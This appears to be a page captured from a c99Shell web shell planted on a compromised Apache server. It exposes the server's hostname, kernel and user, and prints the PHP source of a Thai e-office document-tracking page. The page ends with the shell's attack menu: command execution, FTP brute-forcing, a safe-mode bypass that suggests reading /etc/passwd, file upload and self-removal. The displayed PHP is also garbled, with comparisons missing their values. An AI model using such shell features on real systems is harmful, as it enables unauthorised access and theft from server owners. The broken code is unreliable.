!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/mistk/mistk/eoffice/admin/   drwxr-xr-x
Free 50.78 GB of 127.8 GB (39.73%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     printRepFollowDocPSDetail.php (14.37 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
include_once("../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../class/clsTable.php";
include_once 
"../class/clsDepartment.php";
include_once 
"../class/clsPerson.php";
include_once 
"../link/function.php";
include_once 
"../link/functionshow.php";
include_once 
"../class/clsDocLinePosition.php";
include_once 
"../class/clsDocLineConfig.php";
include_once 
"../class/clsReceiveSendType.php";
include_once 
"../class/clsDocType.php";
include_once 
"../class/clsDocSpeedLevel.php";
include_once 
"../class/clsDocSecreLevel.php";
include_once 
"../class/clsDocattatchesTmp.php";
include_once 
"../class/clsDocuments.php";
include_once 
"../class/clsDocattatches.php";
include_once 
"../class/clsDocReceiveSend.php";
include_once 
"../class/clsProposeType.php";
include_once 
"funct.php";
include_once 
"../class/clsDocSendtoPsTmp.php";
include_once 
"../class/clsannounceDocType.php";
include_once 
"../link/keyThai.php";
include_once 
"getPrefix.php";
$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oDP4 = new Department($oC);
$oDP5 = new Department($oC);
$oPS = new person($oC);
$oPS2 = new person($oC);
$oPS3 = new person($oC);
$oPS4 = new person($oC);
$oPS5 = new person($oC);
$oPS6 = new person($oC);
$oDlc = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlc3 = new DocLineConfig($oC);
$oDlc4 = new DocLineConfig($oC);
$oDlc5 = new DocLineConfig($oC);
$oDlc6 = new DocLineConfig($oC);
$oDlc7 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oDlp1 = new docLinePosition($oC);
$oDlp2= new docLinePosition($oC);
$oRSt = new receiveSendType($oC);
$oDt = new doctype($oC);
$oDsl = new DocSpeedLevel($oC);
$oDcl = new DocSecretLevel($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDoc = new Documents($oC);
$oDoc2 = new Documents($oC);
$oDoc3 = new Documents($oC);
$oDoc4 = new Documents($oC);
$oDatt = new Docattatches($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs2 = new DocReceiveSend($oC);
$oRs3 = new DocReceiveSend($oC);
$oRs4 = new DocReceiveSend($oC);
$oRs6 = new DocReceiveSend($oC);
$oRs7 = new DocReceiveSend($oC);
$oRs8 = new DocReceiveSend($oC);
$oPt = new ProposeType($oC);
$oStmp=new DocSendToPsTmp($oC);
$oAn=new announceDocType($oC);
$MaxDocGroup=$oDP->SearchMaxDocGroup();

    
$oDoc->SearchByKey($DocID); $oDoc->GetRecord();
    
$oDlc->SearchByKey($DLCID); $oDlc->GetRecord(); 
    
$oRs->SearchByKey($DrsID); $oRs->GetRecord(); 

?>
<title>รายละเอียดการติดตามหนังสือที่กำหนดวันแล้วเสร็จ</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<body>
<div id="tabmargin">
       <form name="ps" method="post" action="RPOIS_103_104_ex.php" target="_self">
          <div align="center">
          </div><br>
        <table width="98%" align="center">
          <tr bgcolor="#FFFFFF">
        <td width="99%"><table width="100%"  cellpadding="1" cellspacing="1">
            <tr> 
              <td height="22"><font   face="MS Sans Serif, Tahoma, sans-serif"><strong>รายละเอียดการติดตามหนังสือที่กำหนดวันแล้วเสร็จ</strong></font></td>
              <td height="22" align="right"><font   face="MS Sans Serif, Tahoma, sans-serif"><strong>OIS...</strong></font></td>
            </tr>
            <tr><td colspan="2">
            <table width="90%" border="0" align="center" cellpadding="0" cellspacing="1" bordercolor="#DADADA" style="border-collapse:collapse">
     <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? echo ShowNameDocNo($oDoc->DtID); ?></strong></td>
             <td width="2%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DocNo!=""){  echo $oDoc->DocNo;   } ?></td></tr>
     <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? echo ShowNameDate2($oDoc->DtID); ?></strong></td>
             <td width="2%" align="center" ><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
            <?   if($oDoc->DocDate!="" && $oDoc->DocDate!="0000-00-00"){ 
                                        echo 
"&nbsp;".abbreDate2($oDoc->DocDate,'/');
                    } 
?>
            </td></tr>
     <? //if($oDoc->DtID!=13){ ?>
      <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>" >&nbsp;&nbsp;<strong><? echo ShowNameSubject($oDoc->DtID); ?></strong></td>
            <td width="2%" align="center"><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<?  if($oDoc->DocSubject!=""){ echo  $oDoc->DocSubject;  } ?></td>
    </tr>
    <? //} ?>
    <? if($oDoc->DtID==|| $oDoc->DtID==|| $oDoc->DtID==||  $oDoc->DtID==14 || $oDoc->DtID==13){?>  
      <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? echo ShowNameFrom($oDoc->DtID); ?></strong></td>
              <td width="2%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DocFrom!=""){ echo  $oDoc->DocFrom;  } ?></td>
          </tr>
    <? ?>
    <? if($oDoc->DtID==13){?>  
      <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ชื่อผู้ได้รับการรับรอง</strong></td>
              <td width="2%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->CertificatePs!=""){   echo $oDoc->CertificatePs; } ?></td>
          </tr>
    <? ?>
    <? if($oDoc->DtID==|| $oDoc->DtID==2  || $oDoc->DtID==14 || $oDoc->DtID==3){?>
       <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? if($DtID==3){   echo "เรียน"; }else{  echo "ถึง"; } ?></strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<?  if($oDoc->DocTo!=""){   echo $oDoc->DocTo; }?></td>        
          </tr>
    <? }?>
      <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>แฟ้มหนังสือ</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
                  <td width="73%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
                  <? if($oDoc->DocPID=="0" || $oDoc->DocPID==""){  $searchDoc=$oDoc->DocID; }else{ $searchDoc=$oDoc->DocPID; } ?>
                  <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>"> 
                    &nbsp;<img src="../picture/attach_ico.gif" alt=""  border="0" >&nbsp;แฟ้มที่เกี่ยวข้อง&nbsp;<? echo a2th($oDatt->CountDocByDocID($searchDoc)); ?>&nbsp;รายการ<br></font> 
                    <? 
                        
                        $oDatt
->SearchByDocID($searchDoc);
                        while(
$oDatt->GetRecord()){  
                            
$c++;  
                            
$pathfile="../documents/".$oDatt->DaUpFileName
                        
?>
                            &nbsp;<a href="<? echo $pathfile ?>" target="_blank"><img src="../picture/allregistered_ico.gif" alt="เปิดดูแฟ้มหนังสือ"  border="0"  style="cursor:pointer;" ></a>&nbsp; 
                        <?    echo "&nbsp;".$c.".&nbsp;".$oDatt->DaFileName."<br>";
                        } 
?>
                  </td>                        
    </tr>
    <? if(($oDoc->DtID==|| $oDoc->DtID==2) && ($oDoc->RsID=="2" || $oDoc->RsID=="1")){?>
    <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>อ้างถึง</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DocRef!=""){   echo $oDoc->DocRef; } ?></td>
    </tr>    
    <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>สิ่งที่ส่งมาด้วย</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DocOther!=""){   echo $oDoc->DocOther; }?></td>
    </tr>
    <? ?>
    <? if($oDoc->DtID==&& ($oDoc->RsID=="4" || $oDoc->RsID=="3")){?>
                <tr height=22><td width="31%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>อ้างถึงหนังสือเพื่อตอบกลับ</strong></td>
                            <td width="2%" align="center"><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DocRefAns!=""){   echo $oDoc->DocRefAns; } ?></td>
                </tr>    
                <? ?>
    <? if($oDoc->DtID==|| $oDoc->DtID==|| $oDoc->DtID==|| $oDoc->DtID==14){?> 
    <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ชั้นตวามเร็ว</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
            <? $oDsl->SearchByKey($oDoc->DslID); $oDsl->GetRecord();  echo "&nbsp;".$oDsl->DslName;?>
             </td></tr>
    <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ชั้นความลับ</strong></td>
                   <td width="2%" align="center" ><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
                <? $oDcl->SearchByKey($oDoc->DclID); $oDcl->GetRecord();  echo "&nbsp;".$oDcl->DclName;?></td>
    </tr>
    <? ?>
    <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>หมายเหตุ</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
                  <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>"> 
                    <? if($oDoc->DocShortDesc!=""){ echo "&nbsp;".$oDoc->DocShortDesc;  }  ?>
                  </td>
                </tr>
                <? if($oDoc->DocforSign=="Y"){  ?>
                <tr height=22>
                  <td width="25%">&nbsp;</td>
                  <td width="2%" align="center">&nbsp;</td>
                  <td > <input name="" type="checkbox" value="" checked disabled>
                    ลงทะเบียนหนังสือลงนาม </td>
                </tr>
                <? ?>        
    <? if($oDoc->sendToPs=="Y"){  ?>
    <tr height=22><td width="25%">&nbsp;</td>
                   <td width="2%" align="center">&nbsp;</td>
                  <td > 
                  <input name="" type="checkbox" value="" checked disabled> ส่งด่วน
                  </td>
                </tr>
    <? ?>
    <? if($oRs->DrsDocDueDate!="0000-00-00"){  ?>
    <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ว/ด/ป ที่กำหนดเสร็จ</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
                  <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
                    <? if($oRs->DrsDocDueDate!="0000-00-00"){  echo  "&nbsp;".abbreDate2($oRs->DrsDocDueDate,'/'); }else{ echo "-";  } ?>
                  </td>
                </tr>
    <? ?>
    <? if($oRs->DrsSendDate!="0000-00-00"){  ?>
    <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ว/ด/ป ที่สั่งการ</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
                  <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>"> 
                    <?  if($oRs->DrsSendDate!="0000-00-00 00:00:00"){  list($DocD,$DocT) = split(' ',$oRs->DrsSendDate); echo "&nbsp;".abbreDate2($DocD,'/')."&nbsp;".a2th($DocT);}?>
                  </td>
                </tr>
    <? ?>
    <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ลักษณะหนังสือ</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
                  <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
                  <?     $oPt->SearchByKey($oRs->PtID);
                            
$oPt->GetRecord();
                            echo 
$oPt->PtName
                    
?>
                    
                  </td>
                </tr>
      </table>
            </td></tr>
            <tr> 
              <td height="24" colspan="2"><hr></td>
            </tr>
            <tr>
          <td colspan="2"> 
            <table border="0" width="95%" align="center">
            <tr><td colspan="2">
            <table width="100%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#DADADA"  style="border-collapse:collapse">
              <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>"><td width="40%" align="center"><strong>ผู้รับหนังสือ</strong></td><td width="15%" align="center"><strong>ว/ด/ป ที่<br>รับทราบ</strong></td><td width="15%" align="center"><strong>ว/ด/ป ที่<br>ดำเนินการเสร็จ</strong></td><td width="15%" align="center"><strong>หมายเหตุ</strong></td></tr>
            <?   $nomainps=0;
                
$oRs8->SearchByDrsFromDrsID($DrsID);
                while(
$oRs8->GetRecord()){   
            
?>
            <td width="17%" height="22"><?     
                            
if($oRs8->personId==0){
                                    
$oDlc->SearchByKey($oRs8->DlcID); $oDlc->GetRecord();  
                                    
$oDP->SearchByKey($oDlc->deptId); $oDP->GetRecord();  
                                    
$oPS->SearchByKey($oRs8->DrsReceivePersonId); $oPS->GetRecord(); 
                                    if(
$oRs8->DrsReceivePersonId!='0'){
                                    echo 
"&nbsp;".GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName;
                                    }else{
                                    echo 
"&nbsp;สารบรรณย่อย";
                                    }
                                    echo 
"&nbsp;&nbsp;(".$oDP->deptName.")<br>";
                                    
$nomainps=1;
                            }else{
                                    
$oPS->SearchByKey($oRs8->personId); $oPS->GetRecord(); 
                                    echo 
"&nbsp;".GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName;
                                    if(
$oRs8->DrsMainPs=="Y"){ echo "&nbsp;<font color=\"#029b0a\">[ผู้รับผิดชอบหลัก]</font>";  $nomainps=0;  }else{  $nomainps=1; }
                                    if(
$oRs8->DrsSendToPs=="Y"){
                                        echo 
"&nbsp;<font color=\"#FF0000\">[ส่งด่วน]</font>";
                                    }
                            }
                
?></td>
            <td width="10%" align="center">
            <?       if($oRs8->DsID=='5' && $oRs8->DrsDocReceiveDate=="0000-00-00 00:00:00"){ echo "เปิดอ่าน<br>แฟ้มหนังสือแล้ว"; }
                    if(
$oRs8->DrsDocReceiveDate!="0000-00-00 00:00:00" && $oRs8->DsID!='6' && $oRs8->DsID!='7'){  list($DocD2,$DocT2) = split(' ',$oRs8->DrsDocReceiveDate); echo abbreDate2($DocD2,'/')."<br>".a2th($DocT2);}
                    if(
$oRs8->DsID=='6'){ echo "ไม่ลงรับหนังสือ"; }
                    if(
$oRs8->DsID=='7'){ echo "แจ้งการส่งผิด"; }?>
                    </td>
            <td width="10%" align="center"><?  if($nomainps==1){  echo "-"; }else{  if($oRs8->DocRefAnsDate!="0000-00-00 00:00:00"){  list($DocD2,$DocT2) = split(' ',$oRs8->DocRefAnsDate); echo abbreDate2($DocD2,'/')."<br>".a2th($DocT2);}} ?></td>
            <td width="10%">&nbsp;</td></tr>
            <? $i++;  }?>
            </table>
            </td></tr>
            </table>
            </td>
            </tr></table>
          </form><br>
</div>
</body>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0163 ]--